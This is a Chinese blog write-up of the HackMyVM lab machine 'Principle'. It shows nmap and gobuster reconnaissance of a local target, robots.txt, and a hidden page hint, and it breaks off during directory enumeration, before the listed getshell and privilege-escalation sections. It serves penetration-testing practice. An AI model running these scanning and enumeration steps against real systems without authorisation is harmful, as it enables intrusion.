<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="ta0"><meta name="copyright" content="ta0"><meta name="generator" content="Hexo 7.1.1"><meta name="theme" content="hexo-theme-yun"><title>HackMyVM-Principle | ta0的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/png" href="/myfa.ico"><link rel="mask-icon" href="/myfa.ico" color="#0078E7"><link rel="preload" href="/css/mycss.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"tao0845.github.io","root":"/","title":"做点小小记录","version":"1.10.11","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"local_search":{"path":"/search.xml"},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/mycss.css"><script src="/js/hexo-theme-yun.js" type="module"></script><link rel="alternate" href="/atom.xml" title="ta0的小站" type="application/atom+xml"><meta name="description" content="难度:medium kali:192.168.56.104 靶机:192.168.56.158 端口扫描┌──(root㉿kali2)-[~&#x2F;Desktop] └─# nmap 192.168.56.158 -sV -A Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2024-04-21 19:08 CST Nmap scan report for 1">
<meta property="og:type" content="article">
<meta property="og:title" content="HackMyVM-Principle">
<meta property="og:url" content="https://tao0845.github.io/posts/85f65919/index.html">
<meta property="og:site_name" content="ta0的小站">
<meta property="og:description" content="难度:medium kali:192.168.56.104 靶机:192.168.56.158 端口扫描┌──(root㉿kali2)-[~&#x2F;Desktop] └─# nmap 192.168.56.158 -sV -A Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2024-04-21 19:08 CST Nmap scan report for 1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/Opi7xC.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpiNJL.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/Opieli.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpiKZt.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpiABX.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/Opig7p.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpimLU.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpiPzv.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpiDTr.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpiHvM.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpiQ7I.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpiSLD.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/Opi0uF.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/Opidz6.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpisPP.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpifTl.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/21/OpnPGK.png">
<meta property="article:published_time" content="2024-04-21T11:07:29.593Z">
<meta property="article:modified_time" content="2024-06-07T05:26:52.620Z">
<meta property="article:author" content="ta0">
<meta property="article:tag" content="子域fuzz">
<meta property="article:tag" content="cp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ooo.0x0.ooo/2024/04/21/Opi7xC.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="ta0"><img width="96" loading="lazy" src="/123.jpg" alt="ta0"></a><div class="site-author-name"><a href="/about/">ta0</a></div><span class="site-name">ta0的小站</span><sub class="site-subtitle">网安小白的成长记录</sub><div class="site-description">Learning For Fun</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">121</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">14</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">197</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/tao0845" title="GitHub" target="_blank" style="color:#6e5494"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://music.163.com/#/user/home?id=312924699" title="网易云音乐" target="_blank" style="color:#C20C0C"><span class="icon iconify" data-icon="ri:netease-cloud-music-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:2814928906@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:mail-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.</span> <span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">web信息搜集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">2.1.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AD%90%E5%9F%9F%E6%89%AB%E6%8F%8F"><span class="toc-number">2.2.</span> <span class="toc-text">子域扫描</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getshell"><span class="toc-number">3.</span> <span class="toc-text">getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83user"><span class="toc-number">4.</span> <span class="toc-text">提权user</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83root"><span class="toc-number">5.</span> <span class="toc-text">提权root</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://tao0845.github.io/posts/85f65919/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="ta0"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="ta0的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">HackMyVM-Principle</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2024-04-21 19:07:29" itemprop="dateCreated datePublished" datetime="2024-04-21T19:07:29+08:00">2024-04-21</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="修改时间：2024-06-07 13:26:52" itemprop="dateModified" datetime="2024-06-07T13:26:52+08:00">2024-06-07</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><span class="icon iconify" data-icon="ri:file-word-line"></span></span> <span title="本文字数">2.8k</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><span class="icon iconify" data-icon="ri:timer-line"></span></span> <span title="阅读时长">15m</span></span></span><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><span class="icon iconify" data-icon="ri:eye-line"></span> <span id="busuanzi_value_page_pv"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/HackMyVM/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">HackMyVM</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/%E5%AD%90%E5%9F%9Ffuzz/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">子域fuzz</span></a><a class="tag-item" href="/tags/cp/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">cp</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><p><strong>难度:medium</strong></p>
<p><strong>kali:192.168.56.104</strong></p>
<p><strong>靶机:192.168.56.158</strong></p>
<h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><pre class="language-bash" data-language="bash"><code class="language-bash">┌──<span class="token punctuation">(</span>root㉿kali2<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─<span class="token comment"># nmap 192.168.56.158 -sV -A</span>
Starting Nmap <span class="token number">7</span>.94SVN <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2024</span>-04-21 <span class="token number">19</span>:08 CST
Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.56.158
Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00059s latency<span class="token punctuation">)</span>.
Not shown: <span class="token number">999</span> filtered tcp ports <span class="token punctuation">(</span>no-response<span class="token punctuation">)</span>
PORT   STATE SERVICE VERSION
<span class="token number">80</span>/tcp <span class="token function">open</span>  http    nginx <span class="token number">1.22</span>.1
<span class="token operator">|</span> http-robots.txt: <span class="token number">1</span> disallowed entry 
<span class="token operator">|</span>_/hackme
<span class="token operator">|</span>_http-title: Welcome to nginx<span class="token operator">!</span>
<span class="token operator">|</span>_http-server-header: nginx/1.22.1
MAC Address: 08:00:27:97:72:0A <span class="token punctuation">(</span>Oracle VirtualBox virtual NIC<span class="token punctuation">)</span>
Warning: OSScan results may be unreliable because we could not <span class="token function">find</span> at least <span class="token number">1</span> <span class="token function">open</span> and <span class="token number">1</span> closed port
Device type: general purpose<span class="token operator">|</span>storage-misc
Running <span class="token punctuation">(</span>JUST GUESSING<span class="token punctuation">)</span>: Linux <span class="token number">4</span>.X<span class="token operator">|</span><span class="token number">5</span>.X<span class="token operator">|</span><span class="token number">2.6</span>.X<span class="token operator">|</span><span class="token number">3</span>.X <span class="token punctuation">(</span><span class="token number">97</span>%<span class="token punctuation">)</span>, Synology DiskStation Manager <span class="token number">5</span>.X <span class="token punctuation">(</span><span class="token number">90</span>%<span class="token punctuation">)</span>, Netgear RAIDiator <span class="token number">4</span>.X <span class="token punctuation">(</span><span class="token number">87</span>%<span class="token punctuation">)</span>
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux <span class="token number">4.15</span> - <span class="token number">5.8</span> <span class="token punctuation">(</span><span class="token number">97</span>%<span class="token punctuation">)</span>, Linux <span class="token number">5.0</span> - <span class="token number">5.4</span> <span class="token punctuation">(</span><span class="token number">97</span>%<span class="token punctuation">)</span>, Linux <span class="token number">5.0</span> - <span class="token number">5.5</span> <span class="token punctuation">(</span><span class="token number">95</span>%<span class="token punctuation">)</span>, Linux <span class="token number">2.6</span>.32 <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">3.10</span> - <span class="token number">4.11</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">3.2</span> - <span class="token number">4.9</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">3.4</span> - <span class="token number">3.10</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">5.1</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">2.6</span>.32 - <span class="token number">3.10</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>, Linux <span class="token number">2.6</span>.32 - <span class="token number">3.13</span> <span class="token punctuation">(</span><span class="token number">91</span>%<span class="token punctuation">)</span>
No exact OS matches <span class="token keyword">for</span> <span class="token function">host</span> <span class="token punctuation">(</span>test conditions non-ideal<span class="token punctuation">)</span>.
Network Distance: <span class="token number">1</span> hop

TRACEROUTE
HOP RTT     ADDRESS
<span class="token number">1</span>   <span class="token number">0.59</span> ms <span class="token number">192.168</span>.56.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="token builtin class-name">.</span>
Nmap done: <span class="token number">1</span> IP address <span class="token punctuation">(</span><span class="token number">1</span> <span class="token function">host</span> up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> <span class="token number">20.07</span> seconds</code></pre>
<p>只有80端口开放了,好好好,直接去web看</p>
<h2 id="web信息搜集"><a href="#web信息搜集" class="headerlink" title="web信息搜集"></a>web信息搜集</h2><p><a target="_blank" rel="noopener" href="https://img.tg/image/Opi7xC"><img src="https://ooo.0x0.ooo/2024/04/21/Opi7xC.png" alt="Opi7xC.png" loading="lazy"></a><br>是一个nginx的default界面</p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><pre class="language-bash" data-language="bash"><code class="language-bash">┌──<span class="token punctuation">(</span>root㉿kali2<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─<span class="token comment"># gobuster dir -u http://192.168.56.158 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</span>
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Gobuster v3.6
by OJ Reeves <span class="token punctuation">(</span>@TheColonial<span class="token punctuation">)</span> <span class="token operator">&amp;</span> Christian Mehlmauer <span class="token punctuation">(</span>@firefart<span class="token punctuation">)</span>
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Url:                     http://192.168.56.158
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Method:                  GET
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Threads:                 <span class="token number">10</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Negative Status codes:   <span class="token number">404</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> User Agent:              gobuster/3.6
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Extensions:              bak,zip,html,txt,php
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Timeout:                 10s
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Starting gobuster <span class="token keyword">in</span> directory enumeration mode
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
/robots.txt           <span class="token punctuation">(</span>Status: <span class="token number">200</span><span class="token punctuation">)</span> <span class="token punctuation">[</span>Size: <span class="token number">68</span><span class="token punctuation">]</span>
/hi.html              <span class="token punctuation">(</span>Status: <span class="token number">200</span><span class="token punctuation">)</span> <span class="token punctuation">[</span>Size: <span class="token number">141</span><span class="token punctuation">]</span>
Progress: <span class="token number">1323360</span> / <span class="token number">1323366</span> <span class="token punctuation">(</span><span class="token number">100.00</span>%<span class="token punctuation">)</span>
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Finished
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span></code></pre>
<p>目录也很少，先去robots看一下<br><a target="_blank" rel="noopener" href="https://img.tg/image/OpiNJL"><img src="https://ooo.0x0.ooo/2024/04/21/OpiNJL.png" alt="OpiNJL.png" loading="lazy"></a></p>
<blockquote>
<p>hi.html</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://img.tg/image/Opieli"><img src="https://ooo.0x0.ooo/2024/04/21/Opieli.png" alt="Opieli.png" loading="lazy"></a><br>给了一个人名<code>Elohim</code></p>
<blockquote>
<p>hackme</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://img.tg/image/OpiKZt"><img src="https://ooo.0x0.ooo/2024/04/21/OpiKZt.png" alt="OpiKZt.png" loading="lazy"></a><br>404……</p>
<blockquote>
<p>investigate</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://img.tg/image/OpiABX"><img src="https://ooo.0x0.ooo/2024/04/21/OpiABX.png" alt="OpiABX.png" loading="lazy"></a><br>只有这个目录能利用了</p>
<blockquote>
<p>In Greek mythology, Talos was a giant automaton made of bronze which protected Europa in Crete from pirates and invaders.<br>He was known to be a gift given to Europa by Zeus himself. </p>
</blockquote>
<p>看下源码<br><a target="_blank" rel="noopener" href="https://img.tg/image/Opig7p"><img src="https://ooo.0x0.ooo/2024/04/21/Opig7p.png" alt="Opig7p.png" loading="lazy"></a><br><em><!-- If you like research, I will try to help you to solve the enigmas, try to search for documents in this directory --></em><br>提示我们扫描目录,那就继续扫</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">┌──<span class="token punctuation">(</span>root㉿kali2<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop<span class="token punctuation">]</span>
└─<span class="token comment"># gobuster dir -u http://192.168.56.158/investigate/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</span>
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Gobuster v3.6
by OJ Reeves <span class="token punctuation">(</span>@TheColonial<span class="token punctuation">)</span> <span class="token operator">&amp;</span> Christian Mehlmauer <span class="token punctuation">(</span>@firefart<span class="token punctuation">)</span>
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Url:                     http://192.168.56.158/investigate/
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Method:                  GET
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Threads:                 <span class="token number">10</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Negative Status codes:   <span class="token number">404</span>
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> User Agent:              gobuster/3.6
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Extensions:              bak,zip,html,txt,php
<span class="token punctuation">[</span>+<span class="token punctuation">]</span> Timeout:                 10s
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Starting gobuster <span class="token keyword">in</span> directory enumeration mode
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
/index.html           <span class="token punctuation">(</span>Status: <span class="token number">200</span><span class="token punctuation">)</span> <span class="token punctuation">[</span>Size: <span class="token number">812</span><span class="token punctuation">]</span>
/rainbow_mystery.txt  <span class="token punctuation">(</span>Status: <span class="token number">200</span><span class="token punctuation">)</span> <span class="token punctuation">[</span>Size: <span class="token number">596</span><span class="token punctuation">]</span>
Progress: <span class="token number">1323360</span> / <span class="token number">1323366</span> <span class="token punctuation">(</span><span class="token number">100.00</span>%<span class="token punctuation">)</span>
